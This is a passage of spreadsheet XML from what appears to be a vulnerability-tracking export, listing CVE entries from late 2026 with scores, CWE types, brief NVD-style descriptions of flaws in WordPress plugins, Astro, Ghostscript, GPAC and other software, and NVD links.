        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S430" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'images' parameter of the plugin's bt_bb_css_image_grid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0" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6170</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6171</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="inlineStr"/>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K431" s="5" t="inlineStr"/>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S431" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'target' parameter of the plugin's bt_bb_icon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1" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6171</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6172</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="inlineStr"/>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S432" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'caption' parameter of the plugin's bt_bb_image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2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6172</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6173</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="inlineStr"/>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S433" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'background_image' parameter of the plugin's bt_bb_section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3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6173</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88037</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="inlineStr"/>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S434" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `title` attribute of the `bt_bb_service` shortcode in all versions up to, and including, 5.7.2.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434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88037</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92712</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="inlineStr"/>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr">
        <is>
          <t>react, gin</t>
        </is>
      </c>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q435" s="5" t="inlineStr"/>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S435" s="5" t="inlineStr">
        <is>
          <t>The ReactPress – Create React App for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'permalink' parameter in all versions up to, and including, 3.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is possible because the permalink parameter is only passed through sanitize_url(), which does not prevent fetching attacker-controlled remote URLs whose response body — including script tags and event-handler attributes — is written verbatim to disk via file_put_contents().</t>
        </is>
      </c>
      <c r="T435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92712</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93908</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="inlineStr"/>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S436" s="5" t="inlineStr">
        <is>
          <t>The Real Estate Manager – Property Listing and Agent Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before_price_text' parameter in all versions up to, and including, 7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability is further enabled by the absence of any capability, nonce, or ownership check on the wp_ajax_rem_create_pro_ajax handler, and because the value is persisted via update_post_meta rather than post_content, the wp_kses filtering tied to the unfiltered_html capability does not apply.</t>
        </is>
      </c>
      <c r="T436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93908</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102136</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="inlineStr"/>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S437" s="5" t="inlineStr">
        <is>
          <t>In multi-node deployments, an attacker who had already obtained code execution on one appliance node could submit a value through an internal cluster interface that was written into monitoring configuration on another node without sufficient validation, potentially allowing OS commands to be executed there. Execution was limited to an unprivileged service account on that node.</t>
        </is>
      </c>
      <c r="T437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102136</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102983</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="inlineStr"/>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr">
        <is>
          <t>npm:@astrojs/netlify</t>
        </is>
      </c>
      <c r="M438" s="5" t="inlineStr">
        <is>
          <t>8.2.4</t>
        </is>
      </c>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q438" s="5" t="inlineStr"/>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-918</t>
        </is>
      </c>
      <c r="S438" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. From 5.2.0 until 8.2.4, the @astrojs/netlify adapter generates regular expressions for Netlify Image CDN remote-image allowlists without anchoring them to the beginning of the URL. Because Netlify evaluates these expressions with RegExp.test(), an allowed origin appearing only in a source URL's path or query can satisfy image.domains or image.remotePatterns while the URL's actual host remains attacker-controlled. An unauthenticated request to the public /.netlify/images endpoint can therefore cause the Image CDN to request attacker-selected URLs and may probe or reach internal services. Netlify egress protections may constrain reachable targets, and image transformation limits direct response exfiltration; no confidentiality or integrity impact has been demonstrated. This issue is fixed in version 8.2.4.</t>
        </is>
      </c>
      <c r="T438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102983</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103115</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="inlineStr"/>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q439" s="5" t="inlineStr"/>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S439" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in OS4ED openSIS-Classic up to 9.3. This affects an unknown function of the file functions/CustomFieldsFnc.php of the component Student Search. The manipulation of the argument cust results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103115</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103222</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="inlineStr"/>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q440" s="5" t="inlineStr"/>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-190</t>
        </is>
      </c>
      <c r="S440" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Blosc C-Blosc2 up to 3.3.2. This impacts the function blosclz_decompress of the file blosc/blosclz.c of the component blosclz Decompression. Executing a manipulation can lead to integer overflow. The attack may be launched remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. Upgrading to version 3.3.3 will fix this issue. This patch is called fe2964d114d97847f56570a0ab2be2c57ccbeedc. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103222</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103226</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="inlineStr"/>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q441" s="5" t="inlineStr"/>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S441" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Artifex Ghostscript up to 10.09.0. Affected is the function type1_callsubr of the file devices/vector/gdevpsfx.c of the component Pdfwrite. The manipulation leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. It is suggested to install a patch to address this issue. A solution was implemented: "I've chosen to fix this slightly differently by using the defined macro in the font parsing loop rather than in the callsubr function, because this better matches the pattern of 'normal' usage."</t>
        </is>
      </c>
      <c r="T441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103226</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103227</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="inlineStr"/>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q442" s="5" t="inlineStr"/>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="S442" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in GPAC up to 26.07.0. Affected by this issue is the function gf_dash_resolve_url of the file src/media_tools/dash_client.c of the component DASH Client. This manipulation causes buffer overflow. The attack is possible to be carried out remotely. Upgrading to version abi-16.26 can resolve this issue. Patch name: 4c8e26f278ff63eec57968f7bc696f604bb0cffd. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103227</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103534</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="inlineStr"/>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="S443" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in David-Crty databasement up to 1.7.1. Affected is the function SnapshotPolicy.viewAny/SnapshotPolicy.view of the file /api/v1/snapshots of the component Snapshot Model. This manipulation causes improper access controls. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. Upgrading to version 1.7.2 is able to address this issue. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103534</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103540</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="inlineStr"/>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q444" s="5" t="inlineStr"/>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-791</t>
        </is>
      </c>
      <c r="S444" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in formtools.org Form Tools up to 3.1.1. This vulnerability affects the function Clients::updateClientSettingsTab of the file global/code/Clients.class.php of the component Client Settings. The manipulation of the argument page_titles leads to improper neutralization of special elements used in a template engine. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103540</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103541</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="inlineStr"/>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q445" s="5" t="inlineStr"/>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="S445" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in formtools.org Form Tools up to 3.1.1. This issue affects the function Files::uploadFile of the file global/code/actions.php of the component Ajax Handler. The manipulation results in unrestricted upload. It is possible to launch the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T445" s="6" t="inlineStr">
        <is>
